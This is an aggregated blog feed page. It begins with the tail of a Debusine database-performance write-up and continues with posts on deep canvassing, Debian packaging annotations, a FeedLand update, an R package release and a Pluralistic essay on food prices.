“Row locks in PostgreSQL” was very helpful in figuring out the correct approach here. Since we’re mainly concerned about the possibility of new foreign key references being created to artifacts we’re considering for expiry, and since that would involve taking FOR KEY SHARE locks on those rows, we can explicitly take FOR UPDATE locks (which conflict with FOR KEY SHARE), and then recompute the set of artifacts to expire with any locked artifacts marked to keep. This was delicate work, but it saved minutes of downtime every day.
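Stripped of the SQL, the recomputation step reduces to set arithmetic: any candidate whose FOR UPDATE lock could not be taken might be gaining new references, so it is marked to keep. A toy model of just that step (the actual logic lives in PostgreSQL queries, not Python):

```python
def plan_expiry(candidates: set, locked_elsewhere: set) -> set:
    """Artifacts we could not lock may be gaining new foreign-key
    references concurrently, so keep them; expire the rest."""
    return {artifact for artifact in candidates if artifact not in locked_elsewhere}
```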

Whole-workflow locking

I mentioned earlier that we avoided some deadlock issues by taking locks on entire workflows. To ensure that these locks are effective even against code that isn’t specifically aware of them, this is implemented by using SELECT FOR UPDATE on all the work request rows in the workflow. In some cases the search for which rows to lock itself tripped up the PostgreSQL planner.

Scheduling

We run multiple Celery workers for various purposes. Some of them can do many things in parallel, but in some specific cases (notably the task scheduler) we only ever want a single instance to run at once. Unfortunately a bug in the systemd service meant that the scheduler often ran concurrently anyway! Once we fixed that, the scheduler logs became a lot less confusing.

When Debusine was small, it was reasonable for it to perform scheduling very aggressively, typically as soon as any change occurred to a work request or a worker that might possibly influence it. This doesn’t scale very well, though, and even though we tried to batch multiple scheduling triggers that occurred within a single transaction, it could still make debugging very confusing. We reduced the number of changes that would result in immediate scheduling, and deferred everything else to a regular “tick”.
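
The "tick" approach can be reduced to a tiny sketch (hypothetical names; the real scheduler runs as a Celery task): bursts of triggers merely set a flag, and the periodic tick performs at most one scheduling pass.

```python
class TickScheduler:
    def __init__(self):
        self.needs_run = False
        self.runs = 0

    def trigger(self):
        # Many events may request scheduling; we only note that a run is due.
        self.needs_run = True

    def tick(self):
        # Called on a timer: at most one scheduling pass per tick.
        if self.needs_run:
            self.needs_run = False
            self.runs += 1

sched = TickScheduler()
for _ in range(500):  # a burst of work request changes
    sched.trigger()
sched.tick()
sched.tick()          # nothing new happened, so no extra run
print(sched.runs)  # → 1
```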

The scheduler may not be able to assign a work request to an idle worker because the workflow is locked. That isn't a major problem in itself; it can just try again later. However, in very large workflows, we found that it often worked its way down all the pending work requests one by one, finding that each of them was locked, which was slow and also produced a huge amount of log noise. It now assumes that if one work request is locked, it might as well skip the other work requests in the same workflow until the next scheduler run.
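
A minimal sketch of that heuristic (illustrative names, not Debusine's actual code): one lock check per workflow per run, instead of one per pending work request.

```python
def schedule(pending, is_workflow_locked):
    """Yield work requests to assign, skipping a whole workflow once one of
    its work requests turns out to be locked."""
    skipped_workflows = set()
    for request in pending:  # (workflow_id, request_id) pairs
        workflow_id, _ = request
        if workflow_id in skipped_workflows:
            continue
        if is_workflow_locked(workflow_id):
            skipped_workflows.add(workflow_id)
            continue
        yield request

checks = []

def locked(workflow_id):
    checks.append(workflow_id)  # stands in for a lock probe in the database
    return workflow_id == 1

# 1000 pending requests in a locked workflow, one in an unlocked workflow.
pending = [(1, n) for n in range(1000)] + [(2, 0)]
assigned = list(schedule(pending, locked))
print(assigned, len(checks))  # → [(2, 0)] 2
```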

Between them, these changes reduced the number of locks typically being held on debusine.debian.net by about 80%:

Lock graph

Worker refactoring

The Debusine worker has always been partially asynchronous, but while it was actually executing a task - in other words, most of the time, at least in busy periods - it didn’t respond to inbound websocket messages, causing spurious disconnections. We restructured the whole worker to be fully event-based.

We also had to put quite a bit of effort into improving the path by which workers report work request completion, because if that hits a timeout then it can mean throwing away hours of work. We have some further improvements in mind, but for now we defer most of this work to a Celery task so that whole-workflow locks aren’t on the critical path.

Database write volume

One of our sysadmins observed that our database write volume was consistently very high. This was a puzzle, but for a long time we left it unexplored. Eventually we thought to ask PostgreSQL's own statistics, and we found a surprise:

debusine=> SELECT relname AS table_name,
debusine->        n_tup_ins AS inserts,
debusine->        n_tup_upd AS updates,
debusine->        n_tup_del AS deletes,
debusine->        (n_tup_ins + n_tup_upd + n_tup_del) AS total_dml
debusine-> FROM pg_stat_user_tables
debusine-> WHERE (n_tup_ins + n_tup_upd + n_tup_del) > 0
debusine-> ORDER BY total_dml DESC
debusine-> LIMIT 20;
              table_name              | inserts |  updates   | deletes | total_dml
--------------------------------------+---------+------------+---------+------------
 db_collectionitem                    | 1418251 | 3578202388 | 3630143 | 3583250782
 db_token                             |   15143 |   11212106 |   11389 |   11238638
 db_workrequest                       |  386196 |    6399071 | 1820500 |    8605767
 db_fileinartifact                    | 2783021 |    1837929 | 1663887 |    6284837
 django_celery_results_taskresult     | 1819301 |    1501623 | 1791656 |    5112580
 db_artifact                          |  960077 |    3340859 |  663890 |    4964826
 db_collectionitemmatchconstraint     | 1550457 |          0 | 2207486 |    3757943
 db_artifactrelation                  | 2229382 |          0 | 1363825 |    3593207
 db_fileupload                        | 1023400 |    1057036 | 1023346 |    3103782
 db_file                              | 1673194 |          0 |  970252 |    2643446
 db_fileinstore                       | 1411995 |          0 |  970259 |    2382254
 db_filestore                         |       0 |    2381578 |       0 |    2381578
 django_session                       |  645423 |    1519880 |     531 |    2165834
 db_workrequest_dependencies          |  365877 |          0 |  936537 |    1302414
 db_worker                            |   18317 |     949280 |    9487 |     977084
 db_collection                        |   10061 |         85 |  177741 |     187887
 db_workerpooltaskexecutionstatistics |   28721 |          0 |       0 |      28721
 db_workerpoolstatistics              |    1640 |          0 |       0 |       1640
 db_workflowtemplate                  |     130 |        158 |     649 |        937
 db_identity                          |      76 |        661 |       0 |        737
(20 rows)

Oh my - that's a lot of db_collectionitem updates, which must surely be out of proportion with what we really need. Can we narrow that down by asking about the most recently updated tuples?

debusine=> SELECT DISTINCT category
debusine-> FROM db_collectionitem
debusine-> WHERE id IN (
debusine->     SELECT id FROM db_collectionitem
debusine->     ORDER BY xmin::text::integer DESC LIMIT 10000
debusine-> );
           category
------------------------------
 debusine:historical-task-run
(1 row)

That might not be absolutely reliable, but it was certainly a hint. As PostgreSQL's documentation explains, by default UPDATE performs a physical update of every matching row regardless of whether the data has changed, and our code to expire old task history entries wasn't guarding against that properly. Once we knew where to look, it was easy to add some extra constraints.
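
The guard amounts to an extra WHERE constraint that filters out rows already holding the target value. A stdlib-only illustration using sqlite3, whose null-safe IS NOT operator plays the role of PostgreSQL's IS DISTINCT FROM (table and data are made up):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE item (id INTEGER PRIMARY KEY, data TEXT)")
conn.execute("INSERT INTO item VALUES (1, 'old'), (2, 'new')")

# Naive form: both rows are physically rewritten, even the unchanged one.
cur = conn.execute("UPDATE item SET data = 'new'")
print(cur.rowcount)  # → 2

conn.execute("UPDATE item SET data = 'old' WHERE id = 1")  # reset row 1

# Guarded form: the WHERE clause filters out rows that already hold the
# target value, so only the genuinely changed row is written.
cur = conn.execute("UPDATE item SET data = 'new' WHERE data IS NOT 'new'")
print(cur.rowcount)  # → 1
```

In PostgreSQL the equivalent guard would be `WHERE data IS DISTINCT FROM 'new'`, which also compares NULLs safely.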

This reduced our mean write volume on debusine.debian.net from about 23 MB/s to about 3 MB/s, which had an immediate knock-on effect on our request failure rate:

Disk write graph

HTTP errors

Current state

Our metrics indicate that things are a lot better now. We still have a few things to deal with, such as:

  • More performance fixes are on their way for some remaining cases where views are very slow or where file uploads from workers fail due to locks.
  • We have some changes in the works to revamp how work request changes propagate through workflows in a way that doesn’t require so many heavyweight locks.
  • We have a number of monitoring and alerting improvements we’d like to make, both for outcomes (things like slow Celery tasks) and possible root causes (database performance). We’d also like to deploy some more modern observability tools; hunting for things using journalctl isn’t terrible, but it’s not really the state of the art.
  • We need to improve how we communicate to users when we’re having operational problems, both informally (IRC, etc.) and on the site.
  • Retries don’t always behave the way you’d expect in workflows.

I hope this has been an interesting tour through the sorts of things that can go wrong in this kind of distributed system!

08:49

In Bloom [Penny Arcade]

New Comic: In Bloom

06:56

Hear This [George Monbiot]

Radical Listening could transform our politics and block the rise of the far right.

By George Monbiot, published in the Guardian 7th May 2026

Most people have made up their minds, and nothing you can say will change them: that’s the credo of parties such as Labour and the Democrats. Don’t challenge voters on the doorstep. Use focus groups to find out what they want, and give it to them. Follow, don’t lead. But all that’s on them, not us.

It’s true that conventional attempts at persuasion fail. A meta-analysis and original experiments by the political scientists Joshua Kalla and David Broockman found that “the best estimate of the effects of campaign contact and advertising” in US general elections “is zero”. But this says nothing about voters and everything about the useless approach of the parties trying to reach them.

Further work by the same scientists along with other people’s studies show that persuasive methods do exist. They don’t change everyone’s minds, but they can make enough difference to win elections and build a kinder, fairer, greener country. These techniques are known as “deep canvassing”.

Deep canvassing works only if you have a large army of volunteers, ideally from the community you’re trying to reach. Instead of delivering a message then scuttling away, as conventional canvassers do, their role is to connect and listen. Across conversations that might last for 10 or 20 minutes, they let people discuss their feelings. Then, without arguing or judging, they share their own experiences and ask questions (“have you ever been treated unfairly?”) that might reveal common ground.

The technique was developed by LGBT activists in Los Angeles after same-sex marriage rights were not voted into law in a state referendum. They wanted to find out why and to see whether people could change their minds. They were amazed by the response, and asked researchers to study the technique. The effects turned out to be significant.

Not only is deep canvassing persuasive but, by contrast to almost all other approaches, the change appears to be durable, at least over the course of months. It seems to have been a decisive factor in the election of Zohran Mamdani as mayor of New York.

What makes the difference is the listening. There’s a solid rule in life: if you don’t listen to other people, they won’t listen to you. I’m often told that people are “too exhausted” to engage in politics. That can mean they’re overwhelmed by work and family life. But it can also refer to the exhaustion of being unheard. The sense that no one is listening is alienating and demoralising.

Another benefit is that deep canvassing allows people to change their minds without losing face. A study in the journal Political Communication found that when someone is heard attentively and without judgment, “they are more likely to become more open-minded and process information in a less defensive manner”. Active listening creates “a sense of shared social identity”, which can build “faith in wider democratic processes”.

All this is compelling enough, but there may be an even more effective means of connection (though it awaits quantification). I’ve been following the work of a remarkable group in my own constituency, South Devon, called Common Ground. It’s not attached to any party, but seeks to prevent the far right from gaining power, to counteract division and create what it calls “a longing for kindness”. Its annual budget is under £400. Instead of going to people’s doors, the volunteers set up a board in a busy street and begin by asking people to put stickers on a chart.

That’s another solid rule in life: people love stickers. On the board are questions designed to provoke conversation on issues such as the NHS, climate, the voting system, immigration, social media, Brexit, public services and polarisation, and boxes in which you can agree or disagree by adding a sticker.

The board is handwritten. Anthea Simmons, the driving force behind Common Ground, tells me this provides a reason to read out the questions to people who may be illiterate without embarrassing them. It’s also a way of starting a conversation. Then the volunteers ask people why they’ve made their choices. They listen attentively, occasionally saying something that connects their experiences, or gently correcting disinformation. It might be quick, it might go on for half an hour.

I’ve watched them at work in two places with high levels of deprivation and social crisis: Paignton and Brixham. These are prime targets for Reform UK, as alienation can easily be channelled into fury at immigrants and other out-groups.

In both places, a small crowd quickly formed around the board and people began chatting to each other as well as the volunteers. “Climate?” one person said. “It’s not affecting us very much yet.” Another replied: “My allotment disagrees. It’s a swamp.”

What leapt out immediately was that most respondents were far to the left of their own voting intentions. The distribution of their stickers suggested a very strong commitment to the NHS, action on climate, compassion, tolerance and an end to billionaire power. But many of the same people have voted or intend to vote for Reform, which would deliver the opposite. This discovery seemed to be equally startling to the participants.

Another thing I witnessed, especially when interviewing people just after these conversations, was a sense of relief, even exhilaration. People were buzzing. Some hardly seemed to hear my questions, but carried on talking about the issues that bothered them: the lack of NHS dentistry, the state of the harbour, corruption, AI, litter, the care crisis. It was as if a bottle had been uncorked.

Being heard is valuable in its own right. Loneliness and alienation, as well as being the feedstock of fascism, are major causes of human misery. The volunteers have been told by some people that it’s the only conversation they’ve had all week. Their overwhelming conclusion? People do care about the lives of others, even when influencers and algorithms push them towards hate and fear.

It wouldn’t be quite right to call this deep canvassing. The volunteers don’t have a script and they’re engaging across a range of issues rather than focusing on one. Perhaps it could be called “radical listening”. To judge by what I witnessed, they seem to have found a way of tearing down the walls dividing us. Do this everywhere, and who knows? We could have a very different country.

www.monbiot.com

06:07

Girl Genius for Monday, May 11, 2026 [Girl Genius]

The Girl Genius comic for Monday, May 11, 2026 has been posted.

01:14

Link [Scripting News]

I have to say something about the Knicks, who just blew out the Sixers in a sweep, 4 games to zero. They've never played this well. They are more than a deep team of great athletes; they are highly intelligent people and they're all really working together. Right now, it feels like a sure thing that they'll breeze through the next round and face off against OKC or San Antonio in the finals, and that will be something. But I know that's not the right way to look at it. The next series is going to be with a team that feels the title is theirs as much as the Knicks do. I've been with the Knicks through the worst of times that never seemed to end. And now for something completely different.

[1297] How to Wake Your Tiger [Twokinds]

Comic for May 10, 2026

01:07

Kernel prepatch 7.1-rc3 [LWN.net]

Linus has released 7.1-rc3 for testing. "I think this answers the 'is 7.1 continuing the larger size pattern that we saw with 7.0?' question, and the answer is yes: that wasn't a fluke brought on by a .0 release - it simply seems to be the new normal."

Sculpt OS 26.04 released [OSnews]

Sculpt OS, the operating system based on the various components that make up Genode, has seen a new release, 26.04. A lot of the new features and changes to Genode that we’ve been talking about for a while now are part of this release, most notably the new human-inclined data syntax that replaces XML as the configuration language for Genode. That’s not the only major improvement, though.

Regarding technical advances of the new version and device support in particular, all Linux-based drivers have been updated to kernel version 6.18, making the system compatible with most modern Intel-PC hardware. Laptop users may appreciate the new USB networking option that is now offered by default.

Software-wise, the new version comes with a longed-after update of Qt6 along with the Chromium-based Falkon browser, downloadable at the depot of cproc. In the same menu, one can find the experimental first version of the Goa SDK running natively on Sculpt OS without the need of a Linux VM. For the first time, Genode components can now be developed, compiled, and tested using Sculpt OS on its own. The amazement of walking without crutches.

↫ Sculpt OS 26.04 release notes

This new release is available for common PC hardware, the PinePhone, and the MNT Reform. 

00:21

Sprite scaling on the Master System: building the new on the ruins of the old [OSnews]

Sprite scaling. It is the coolest effect of the 2D arcade era, a must-have for games from Space Harrier to Real Bout Fatal Fury Special. Home consoles pretty much lacked it - sorry, Nintendo, but Mode 7 only scales a background, not sprites. So you might be surprised to hear that Sega's plucky underdog Master System could do it. Well, don't get your hopes up; this is far too limited - calling it scaling is overstating things. But let's dig in anyway!

↫ Nicole Branagan

Nicole Branagan has the best articles on obscure console features, and this one is no exception.

Sunday, 10 May

18:28

Link [Scripting News]

Leaflet is a nice editor designed to work with Bluesky. But they've been branching out. They now support email and RSS output. They're going in the right direction: toward the internet with email, and toward the web with RSS. As nice as Bluesky is, it's a small part of the web, and it isn't as open as it might appear to be, imho.

16:49

57 [Whatever]

I’m fifty-seven today, and today is the first birthday that I can actually say that I can really feel I’m getting older. I have an arthritic knee now, which if I don’t take medication for will remind me that it’s arthritic; it’s also the first thing with my body (other than occasional seasonal allergies) that I habitually have to take a pill for. On the cosmetic level, the structure of my neck has begun to collapse, and while some of that has to do with the fact I’m carrying more weight around than I have before, I suspect that even when I get down to a more comfortable weight for me (this is on the “to do” list for my fifty-seventh year), the lack of structure will still be there. My already very thin hair up top has become even thinner. I have started wearing cardigans.

On the other hand, my career is going great, my family is terrific, and I’m married to the best human I know. I see friends often, I travel all over the place to see people who are happy I’ve come to where they are, and I get to do with my life pretty much what I’ve ever wanted to do. Is that all worth the arthritic knee and the collapsing neck structure? Well, here’s the thing: At this point in the game, the arthritic knee and collapsing neck structure would be happening anyway, regardless of the circumstances of my life. On balance, I have very little to complain about on this, my fifty-seventh birthday, and much to be happy for and grateful about.

So that’s what I’m going to focus on. It’s a good day where I am, and I hope it’s a good day where you are, too. Happy my birthday to you! And many more!

— JS

15:28

Routing around the algorithms [Scripting News]

AOC in an interview nailed everything in one brief answer to a question from the audience. You can watch it here.

It was so good and quotable that I recorded it and created a transcript via Google and Claude.

I've been emailing with Josh Marshall at TPM for the last few weeks, saying that we can't just keep building on what the tech industry has given us as a news distribution system. AOC touches on this in her answer -- she says the tech people control the algorithms, and they do. But the web doesn't have algorithms, and we have enough standards available to create a very good network that isn't owned by anyone.

I was at one time motivated by money, the same way politicians are motivated to attain higher office, but when the web popped up I had an impulsive idea: I'm not doing it for money anymore. I'm doing it so we can change our political and work communication so it gives power to the people, not to the tech industry. At that time we were already dealing with the excesses of tech, and I knew it well because I was an insider.

They are welcome to make products for it, but they can't control the users. That's what I envisioned in the 90s and 00s. The ads won't be as important as what people say, because the price of using the web is very low. But we got snookered anyway. The VCs were only motivated by money, and to maximize that, they needed maximum control, and they got it. People like being part of big things, and Twitter was and still is big.

We're now at the next turning point. AI is creating new pathways for ideas to flow. It's all wide open right now, more open than it's been in over 20 years. Right now we could put a twitter-like product there that you can set up in a few minutes, run it yourself, or join one that's run by a friend. And they federate immediately. All based on the open standards of the web. Every component replaceable. No big central thing to be owned.

But Josh, we can't do it without your help. AOC doesn't know us. She probably doesn't think about how the web could route around the algorithms. But she, and you, should be thinking about that, and Heather Cox Richardson too, because we can create the people's tool for the change she wants, which is the change I want, and you want too (I read your columns). But we have to work together to make it happen.

BTW, all politicians should swear by what she says. And we should never care about polls. We should only care about results.

Transcript of AOC's answer

I recorded the interview, Claude did a light edit of the transcript. I highlighted the part about the algorithms.

You know, it's funny, because, in this op-ed that Jeff Bezos paid for in the Washington Post, there was this line where you had mentioned earlier about me as a potential 2028 contender, and in the context of that, it was very clear this was a veiled threat, right?

So the elite think: if you want this job, you just stepped out of line. And we want you to know where the real power is. And it's in the modern-day barons who own the Post and own the algorithms. And we're gonna— we'll make an example out of you.

And what's funny about that is that they assume that my ambition is positional. They assume that my ambition is a title or a seat. But my ambition is way bigger than that. My ambition is to change this country.

Presidents come and go. Senate and house seat elected officials come and go. But single-payer healthcare's forever. In many ways, it's forever work, right? Forever work is what we should follow, and so anyways, I— the way— but to put a finer point on your question, is that when you aren't attached, right? When you haven't been, like, fantasizing about being this or that since the time you're seven years old, it's a tremendously liberating thing. Because I get to wake up every day and say, how am I going to meet the moment? And conditions change radically all the time. So, I make my response— less out of an attachment to a positional, like, you know, title or position and working backwards from there— but I make decisions by waking up in the morning, looking out the window and observing the conditions of this country and saying, what move or what decision can I make today that's going to get us closer to that future— stronger, faster, better than yesterday?

10:21

Empathy is difficult [Seth's Blog]

It requires skill and effort. It can be taught. And it’s worth prioritizing.

When we wing it, allocate little time to it or assume it’s a side effect of our work, we diminish the effort and blur our focus.

“I wonder what it’s like to be you” is part of what makes us human, but we’re rarely as focused on this work as we could be.

Simply announcing how hard it is is a fine place to begin.

10:07

Steinar H. Gunderson: MySQL hypergraph optimizer [Planet Debian]

MySQL released (well, flipped the default compilation flag for) the hypergraph join optimizer in the community builds; this was the main project I started and worked on while I was there, so it's nice to see even though it's been default in e.g. their cloud column store for a long time. You can read their blog post (though beware, likely-LLM text ahead).

(The cost model improvements and TPC-DS benchmarking are from after my time.)

00:00

Dirk Eddelbuettel: RcppSpdlog 0.0.29 on CRAN: Small Enhancement [Planet Debian]

Version 0.0.29 of RcppSpdlog arrived on CRAN today, has been uploaded to Debian and built for r2u. The (nice) documentation site has been refreshed too. RcppSpdlog bundles spdlog, a wonderful header-only C++ logging library with all the bells and whistles you would want that was written by Gabi Melman, and also includes fmt by Victor Zverovich. You can learn more at the nice package documentation site.

This release features a rewritten internal routine unpacking the R variadic arguments into C++ variadic template arguments. This in turn allows us to switch back to std::format in C++ mode when C++20 is used. We also adjust for the not-quite-ready-for-this state of the x86-64 based macOS machine at CRAN: it is running a compiler and SDK combination that cannot fully deal with C++20, so we dial compilation on it down to C++17. Similarly, as we found out after the release, Ubuntu jammy is also too old to default to std::format, so we need to add better detection there too so that we can fall back to the included fmt.

The NEWS entry for this release follows.

Changes in RcppSpdlog version 0.0.29 (2026-05-08)

  • Some small continuous integration updates

  • The internal formatter was rewritten as a recursive generator of variadic templates.

  • Switch back to std::format with C++20, but force inferior macos-release-x86_64 to use C++17 rather than default C++20 which fails

Courtesy of my CRANberries, there is also a diffstat report detailing changes. More detailed information is on the RcppSpdlog page, or the package documentation site.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.

Saturday, 09 May

20:07

Jelmer Vernooij: Remove-after Annotations for Debian Files [Planet Debian]

deb-scrub-obsolete is a tool in the debian-codemods suite that tries to identify and remove cruft automatically. It knows about dummy transitional packages, superseded alternatives, and similar patterns it can detect by querying the archive. But some workarounds are too project-specific for a generic tool to recognise on its own.

Developers can leave structured comments in their packaging files that tell deb-scrub-obsolete when a particular line or block can be removed.

The Debian Janitor regularly runs various codemods like deb-scrub-obsolete on all vcs-accessible Debian packages. This means that if you leave a “remove-after: trixie” annotation in your package, you will automatically get a pull request to remove the annotated code once trixie has been released, without needing to remember to do it yourself.

The Comment Format

The annotations take the form of specially-formatted comments. For shell files (and by extension most maintainer scripts), a line-level annotation looks like this:

install -m 755 compat-wrapper /usr/lib/foo/  # remove-after: trixie

When trixie has been released, deb-scrub-obsolete will remove that line entirely. The comment can appear anywhere on the line — before or after other comments — and additional explanatory text can follow:

blah  # Trixie comes with blah built in # remove-after: trixie
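
Handling the line-level form can be sketched with a simple regular-expression scan (a hypothetical sketch; the real deb-scrub-obsolete implementation may differ):

```python
import re

# Matches the trailing annotation comment, wherever it sits on the line.
LINE_ANNOTATION = re.compile(r"#\s*remove-after:\s*(?P<release>\S+)")

def scrub_lines(text, released):
    """Drop every line whose remove-after release has been released."""
    kept = []
    for line in text.splitlines():
        match = LINE_ANNOTATION.search(line)
        if match and match.group("release") in released:
            continue
        kept.append(line)
    return "\n".join(kept)

script = """\
set -e
install -m 755 compat-wrapper /usr/lib/foo/  # remove-after: trixie
echo done"""

print(scrub_lines(script, released={"trixie"}))
```

Before trixie is released the annotation does not match any released name, so the file passes through unchanged.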

For larger sections, block-level annotations bracket the code to remove:

# begin-remove-after: trixie
alternatives --add foo bar
alternatives --add foo bar1
# end-remove-after

These blocks can be nested, which is useful when one outer condition wraps several inner ones with finer-grained timing.
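
Block-level removal, including nesting, can be sketched as a small stack-based scan (again hypothetical; a real implementation should leave the whole file untouched on any parse failure, as the format specifies):

```python
def scrub_blocks(text, released):
    kept, stack = [], []  # stack of "drop this block?" flags
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("# begin-remove-after:"):
            release = stripped.split(":", 1)[1].strip()
            # An inner block inherits "drop" from its enclosing block.
            drop = release in released or bool(stack and stack[-1])
            stack.append(drop)
            if not drop:
                kept.append(line)  # keep the marker for later runs
        elif stripped.startswith("# end-remove-after"):
            drop = stack.pop()
            if not drop:
                kept.append(line)
        elif not (stack and stack[-1]):
            kept.append(line)
    return "\n".join(kept)

script = """\
echo always
# begin-remove-after: trixie
alternatives --add foo bar
# end-remove-after
echo also-always"""

print(scrub_blocks(script, released={"trixie"}))
```

When the condition is not yet met, the markers themselves are preserved so a later run can still remove the block.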

Expressions

The initial set of supported expressions is deliberately small. The main one is a Debian release name: remove-after: trixie means “once trixie has been released”. The condition is checked against distro-info (https://manpages.debian.org/trixie/distro-info/distro-info.1.en.html), the same data source that other Debian tooling uses to track release status.

The expression language is designed to be monotonic — conditions should only ever go from false to true, not back. A workaround that needs to be re-introduced after removal belongs in a new commit, not in an annotation. If deb-scrub-obsolete cannot parse an annotation it finds in a file, it leaves all annotations in that file untouched, to avoid a situation where related blocks are only partially removed.

Annotations can also carry a marker name — an arbitrary label with no spaces, commas, or the word “after” — which can then be passed to deb-scrub-obsolete on the command line. This makes it possible to trigger removal of a named set of annotations together, useful for coordinated transitions where several packages need to be cleaned up at the same time.

Future Extensions

The initial expression set is minimal; the design leaves room for richer conditions. Some candidates under consideration:

  • Whether a particular suite has a new enough version of a package (removing a Build-Depends version constraint once it is satisfied everywhere)
  • Whether a package has been removed from the archive
  • Whether all currently-supported releases contain a new enough version
  • Whether a Debian transition has completed

Compound expressions using “and” / “or” are also on the list, for cases where removal depends on multiple conditions being true simultaneously.

Status

The annotation format is specified but not yet implemented in deb-scrub-obsolete - it is planned for a future release. If you maintain Debian packages and have opinions on the annotation format or the expression language, feedback is welcome. The specification lives in scrub-obsolete/doc/scrub-annotations.md in the lintian-brush repository. Many thanks to Helmut Grohne for the initial suggestion and feedback on the design.

16:00

Web to Mastodon makes sense [Scripting News]

A post from Scripting News, automatically mirrored to a WordPress site, flowed via ActivityPub to Mastodon, thanks to a relatively new feature in WordPress. Almost by accident, Mastodon supports long text, styling and links -- even though its editor doesn't generate them, if they come from outside it will respect the styling.

Below is a post on Mastodon coming from WordPress. Masto's limits aren't enforced, and that's good.

15:14

The value of having a good bench [Scripting News]

The Knicks continue to astound. Last night, they went up 3-0 against the Sixers in Philadelphia. Game 4 is tomorrow at 3:30PM Eastern.

Last night's game was a fantastic contrast with the way the Knicks played in the post-season last year. They had the same starting lineup then, but a different coach, one who rarely put in the bench players unless he had to because of injury. As a result our starters were always playing exhausted, and it got worse as they got deeper into the post-season, until finally in the conference finals against Indiana they had no more gas and were eliminated. This year's Knicks have a deep bench of fantastic players whom the new coach rotates in, and that makes all the difference. Why? Because the players on the court for the Knicks aren't particularly tired, and if they are, they can get a rest.

So in the first period the Sixers came out with fury, and they won the first quarter, because both teams were fresh. Maybe the Knicks were onto their problem, and didn't fight too hard to win the first, knowing they'd have the big advantage in the second, third and fourth, when the Sixers players' legs would be getting wobbly and they'd be thinking too much about the shots they were taking.

Also worth noting: we have a grudge against the Philadelphia team, especially their overwhelmed and dirty-playing big man, Embiid.

The Knicks have a fantastic core team, veterans in their prime, who have been with each other, some since college. They have added to the team incredibly well. Every player coming off the bench has a special power, and it all works.

What's the limit? Unlike many fans I'm not in the expectations business. I'm happy to see how well they're playing now, and am prepared for whatever lessons come our way in the rest of the playoffs.

Performance work on FeedLand [Scripting News]

Just spent a couple of days working on FeedLand in Claude Code. I want to do some work on features, but first we're looking at performance issues. There had been a longtime problem with categories that didn't have many feeds when viewed through the news pages. Examples: the podcasts category, or the NYT category.

You can test it yourself. I used the categories on the news page on feedland.org for the test.

When I checked feedland.org, all my categories on the news page displayed slowly except for All, which we had optimized back in October 2025. So I worked with Claude on this yesterday, ran a set of tests, and realized that last year's optimization made categories with very few feeds much slower. We put in an exception, installed the new software on feedland.org, and I'm happy to report that all my tabs are fast now.

Now all the tabs are fast enough. I'd always like them to be faster, but all load in less than 2 seconds, most in less than 1.
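If you want to check the load times yourself, a minimal sketch is to wrap a fetch in a wall-clock timer (the helper below is my own illustration, not FeedLand code):

```python
import time

def timed(fn):
    """Run fn() and return its result plus elapsed wall-clock seconds."""
    start = time.perf_counter()
    result = fn()
    return result, time.perf_counter() - start
```

For example, `timed(lambda: urllib.request.urlopen("https://feedland.org/").read())` gives a rough single-run load time; a fairer measurement would average several runs to smooth out network jitter and cache effects.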

The new version is not installed on feedland.com or feedland.social yet.

14:28

Pluralistic: Trump's fruitless search for a goreable ox (09 May 2026) [Pluralistic: Daily links from Cory Doctorow]


Today's links



Two men in suits seated next to each other. The younger man is pointing at a brochure. The younger man's head has been replaced with a whole roast chicken. The older man's head has been replaced with a large beef roast. The brochure has been replaced with vintage meat ads. The background is a cropped section of a high-magnification scan of a US $100 bill, colors faded and shifted.

Trump's fruitless search for a goreable ox (permalink)

I've got good news and bad news for Trump. The good news: you can get elected by promising to do something about the cost of living crisis, and the president actually has a lot of ways to improve people's daily costs. The bad news: everything you could do to fix working people's cost of living will make an oligarch worse off.

This is the essential conundrum of Trumpismo: to keep his base happy, he needs to make their lives better; but to make their lives better, he'll have to make oligarchs angry. The oligarchs' wealth bonanza caused the cost of living crisis. Oligarchs' pleasure causes our suffering, so alleviating our suffering will reduce their pleasure.

This means that while Trump can promise help with prices, all he can deliver is union-busting, ICE lynchings, and pointless wars, none of which have any hope of materially improving the lives of working people. Indeed, all of this stuff makes working people materially worse off, as wages fall, crops rot in the fields, and gas prices shoot through the roof.

Trump would dearly love to find an ox he can safely gore, but all the good oxen are owned by his oligarch chums. Trump can't punish Ticketmaster, because the billions Ticketmaster steals from the WWE, F1 and football fans in his base all land in the pocket of oligarchs who own stock in Ticketmaster, and Trump can't afford to upset those oligarchs:

https://pluralistic.net/2024/06/03/aoi-aoi-oh/#concentrated-gains-vast-diffused-losses

Indeed, I can't think of a single corrupt racket that Trump can afford to do something about. Not even the only cost of living metric that can approach gas prices in the hierarchy of American electoral salience: grocery prices.

Your grocery bill went up because oligarchs price-gouge you. Eggflation was caused by Cal-Maine, the monopolist that owns every brand of eggs in your grocer's fridge, who jacked up prices because they knew they could:

https://pluralistic.net/2025/03/10/demand-and-supply/#keep-cal-maine-and-carry-on

Pepsi and Walmart conspired to force every retailer to jack up the prices of all Pepsi products (including Frito-Lay, Gatorade, Aquafina, etc) so that Walmart could also jack up its prices and still undersell the competition (naturally, Trump let them get away with it):

https://www.thebignewsletter.com/p/secret-documents-show-pepsi-and-walmart

This stuff isn't exactly a secret. Grocery store owners hold earnings calls with their investors where they boast about the fact that they can raise their prices far in excess of their increased costs, and blame it on inflation:

https://pluralistic.net/2023/03/11/price-over-volume/#pepsi-pricing-power

They boast about their "personalized pricing" swindles, whereby they use surveillance data to figure out how desperate you are and jack up the prices you see in their apps:

https://pluralistic.net/2025/12/11/nothing-personal/#instacartography

Trump has the power to put a stop to all of this, but still, he can't, because his oligarch pals would squeal, and when they squeal, Trump jumps. In theory, Trump has lots of power, but in practice, Trump can't do anything.

Which brings me to the cost of meat. Meat inflation has raced ahead of other forms of food inflation, even as the payments to ranchers and other producers fell sharply, leading to waves of bankruptcies:

https://www.thebignewsletter.com/p/beef-is-expensive-so-why-are-cattle

Partly, that's because meat processing is controlled by cartels, with 85% of all the beef being processed by four packers, and nearly every chicken going through one of four poultry processors. These middlemen jack up prices to grocers while colluding to push down the payments to their suppliers.

